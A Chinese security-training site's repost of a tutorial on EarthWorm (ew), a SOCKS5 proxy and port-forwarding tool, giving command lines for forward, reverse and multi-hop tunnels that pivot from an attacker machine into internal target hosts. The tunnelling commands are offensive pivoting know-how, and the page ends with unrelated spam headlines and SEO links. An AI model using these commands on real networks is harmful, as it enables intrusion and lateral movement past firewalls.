登录
当前位置: 网站首页 > 网络安全培训 > 正文

EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具

freebuffreebuf 2021-05-11 503 0

本文来源:earthworm

一句话说明:复杂内网下,数据转发,转出转入工具;常用于socks5代理,深度扫描内网;

官方:EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

零、前言

本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。

一、要点先说

1.ew 自身的各个选项用途说明

-l 指定要监听的本地端口 -d 指定要反弹到的机器 ip -e 指定要反弹到的机器端口 -f 指定要主动连接的机器 ip -g 指定要主动连接的机器端口 -t 指定超时时长,默认为 1000 

2.正向代理和反向代理用途的区别

正向代理的典型用途是为在防火墙内的局域网客户端提供访问Internet的途径。 反向代理的典型用途是将防火墙后面的服务器提供给Internet用户访问。 

3.rssocks 启动的socks5服务,转发到最后一步必须使用rcsocks接收

4.工具下载地址

http://rootkiter.com/EarthWorm/supportlist/

Program NameDescribeEg
ew_for_Win.exe适用各种Windows系统(X86指令集、X64指令集)Windows7、Windows XP
ew_for_Linux32各常见Linux发行版 (X86 指令集 CPU)Ubuntu(X86)/BT5(X86)
ew_for_linux64各常见Linux发行版 (X64 指令集 CPU)Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64MacOS系统发行版 (X64 指令集)苹果PC电脑,苹果server
ew_for_Arm32常见Arm-Linux系统HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel常见Mips-Linux系统 (Mipsel指令集 CPU)萤石硬盘录像机、小米mini路由器(R1CM)

二、端口转发功能

场景一

在攻击机运行工具,主动连接靶机3389端口,并将靶机的3389映射到攻击机本地1080端口;达到在攻击机侧访问本地1080端口,将数据转发到靶机3389;

./ew -s lcx_tran -l 1080 -f 114.114.114.114 -g 3389 

image

场景二

攻击机侧运行工具,做1080端口转发本地8080端口,且8080端口接受外部连接;靶机将本地3389端口数据转发到攻击机8080端口;
最终形成一条由靶机主动外联攻击机,并在靶机与攻击机形成一条数据转发通道:攻击机1080--------->3389靶机

第一步:./ew -s lcx_listen -l 1080 -e 8080 第二步:./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.1 -g 3389 

image

三、socks5代理功能

场景一(正向代理)

在靶机侧运行工具监听1080端口对外提供socks5代理服务;在攻击机侧使用代理工具(例如:proxychains)连接靶机提供的socks5代理服务,继续渗透扫描内网。

./ew -s ssocksd -l 1080 

image

场景二(反向代理)

靶机侧运行工具,本地启动socks5服务,主动外联攻击机8080端口,攻击机侧运行工具,将对外访问的8080端口与到本地1080端口做映射,进行数据转发;

第一步:./ew -s rcsocks -l 1080 -e 8080 第二步:./ew -s rssocks -d 114.114.114.114 -e 8080 

image

场景三(正向代理):

靶机侧运行工具启动socks5服务,边缘机侧运行工具将本地从1080端口收到的数据全部转发到靶机1086端口,在攻击机侧使用代理工具(例如:proxychains)连接边缘机提供的1080端口;最终达到攻击机侧与靶机之间形成socks5代理通道,继续渗透扫描内网。

第一步:./ew -s ssocksd -l 1086 第二步:./ew  -s lcx_tran -l 1080 -f 10.0.0.2 -g 1086 

image

场景四(反向代理):

靶机侧运行工具启动socks5服务,边缘机侧运行工具连接靶机1086端口并主动外联攻击机8080端口;攻击机侧运行工具,对外监听8080端口,并将数据转发到本地1080端口;最终实现在攻击机侧1080端口--->靶机之间形成一条代理通道;

第一步:./ew -s ssocksd -l 1086 第二步:./ew -s lcx_listen -l 1080 -e 8080 第三步:./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 1086 

image

场景五(反向代理)-复杂型多级联接

靶机侧运行工具本地启动socks5服务并反向连接中间机7777端口;中间机侧运行工具将9999端口与7777端口数据转发互通;边缘机侧运行工具,通过主动外联攻击机8080端口将数据转发到中间机9999端口;攻击机侧运行工具,对外监听8080端口,并将数据转发到本地1080端口;最终实现在攻击机侧1080端口--->靶机之间形成一条代理通道;

第一步:./ew -s lcx_listen -l 9999 -e 7777 第二步:./ew -s rssocks -d 10.0.1.2 -e 7777 第三步:./ew -s rcsocks -l 1080 -e 8080 第四步:./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 9999 

image

四、最后说点什么

1.耐下心来

刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。

2.动手实践

看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。

3.横向比较

3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;工具下载方式如下:

#git clone https://github.com/rootkiter/Binary-files.git #cd Binary-files #git checkout bd32230 HEAD 目前位于 bd32230 fix ew version #ls EarthWorm README.md Termite 

其中Termite文件夹下面就是工具;

3.2然后我在学习Termite的过程中又找到了一个和Termite功能基本一致的工具Venom(地址:https://github.com/Dliv3/Venom),我可以说这两个工具对我来说可以算是“神器”了!因为本篇重点是介绍EW的使用方法,后面再根据情况,也记录一下这两个“神器”工具的使用;

感兴趣的小伙伴可以学习一下Termite/Venom,玩起来挺爽;

参考文章:

0.项目主页

http://rootkiter.com/EarthWorm/

1.内网穿透的n种姿势

https://xz.aliyun.com/t/9454?accounttraceid=69827aec0fbd4da68045e255cee9fd32xlwo

2.EW使用

https://blog.csdn.net/ws13129/article/details/94445378

3.内网渗透入门到放弃之必备杀器

https://www.shangyouw.cn/win7/arc36509.html

4.Termite官方介绍说明

http://rootkiter.com/Termite/

http://rootkiter.com/Termite/README.txt

https://github.com/rootkiter/Termite

5.Venom官方介绍说明

https://github.com/Dliv3/Venom

转载请注明来自 网盾网络安全培训,本文标题: 《EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具》

标签: 内网渗透 VENOM earthworm ew Termite

  • 上一篇: 中间人攻击之DNS欺骗
  • 下一篇: Mac下Hfish蜜罐搭建及使用体验

猜你喜欢

  • 基于FRP反向代理工具实现内网穿透

    基于FRP反向代理工具实现内网穿透

  • 内网渗透中的 Net-NTLM Relay Attack

    内网渗透中的 Net-NTLM Relay Attack

  • 一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

    一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

  • 内网渗透之内网信息查看常用命令

    内网渗透之内网信息查看常用命令

  • 网络安全培训
  • 黑客培训
关于我

欢迎关注微信公众号

  • QQ

  • 微博

  • 邮箱

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

  • QQ

  • 微博

  • 邮箱

标签列表
    网络安全 物联网安全 网络安全技术 黑客 漏洞 web安全 CTF 内容安全 合天智汇 人工智能 业务安全 数据安全 企业安全 勒索软件 渗透测试 内网渗透 绿盟科技 移动安全 系统安全 青莲云 apt 信息安全 网络攻击 RPA机器人 软件

聚圣源浙江卫视在线观看g7为什么没有中国公司起名测试免费吉凶打分清宫妾妃改变了我的生活100个好听的男孩起名历史的天空剧情扬州起名大师起名字周字个体机械租赁起名春饼怎么做又软又好吃易氏女孩起名字一般快递费多少钱眼镜店名字怎么起[综名著]了不起的达西小姐夏侯颇余姓如何起名排生辰八字起名字包姓起名字男孩取名还是起名256影院汽车美容店起名门的悬念修行者王盛德女孩起洋气的小名一点的洪武大案演员表大学生毕业评语给金姓女宝宝起名台湾电视台在线直播淀粉肠小王子日销售额涨超10倍罗斯否认插足凯特王妃婚姻让美丽中国“从细节出发”清明节放假3天调休1天男孩疑遭霸凌 家长讨说法被踢出群国产伟哥去年销售近13亿网友建议重庆地铁不准乘客携带菜筐雅江山火三名扑火人员牺牲系谣言代拍被何赛飞拿着魔杖追着打月嫂回应掌掴婴儿是在赶虫子山西高速一大巴发生事故 已致13死高中生被打伤下体休学 邯郸通报李梦为奥运任务婉拒WNBA邀请19岁小伙救下5人后溺亡 多方发声王树国3次鞠躬告别西交大师生单亲妈妈陷入热恋 14岁儿子报警315晚会后胖东来又人满为患了倪萍分享减重40斤方法王楚钦登顶三项第一今日春分两大学生合买彩票中奖一人不认账张家界的山上“长”满了韩国人?周杰伦一审败诉网易房客欠租失踪 房东直发愁男子持台球杆殴打2名女店员被抓男子被猫抓伤后确诊“猫抓病”“重生之我在北大当嫡校长”槽头肉企业被曝光前生意红火男孩8年未见母亲被告知被遗忘恒大被罚41.75亿到底怎么缴网友洛杉矶偶遇贾玲杨倩无缘巴黎奥运张立群任西安交通大学校长黑马情侣提车了西双版纳热带植物园回应蜉蝣大爆发妈妈回应孩子在校撞护栏坠楼考生莫言也上北大硕士复试名单了韩国首次吊销离岗医生执照奥巴马现身唐宁街 黑色着装引猜测沈阳一轿车冲入人行道致3死2伤阿根廷将发行1万与2万面值的纸币外国人感慨凌晨的中国很安全男子被流浪猫绊倒 投喂者赔24万手机成瘾是影响睡眠质量重要因素春分“立蛋”成功率更高?胖东来员工每周单休无小长假“开封王婆”爆火:促成四五十对专家建议不必谈骨泥色变浙江一高校内汽车冲撞行人 多人受伤许家印被限制高消费

聚圣源 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化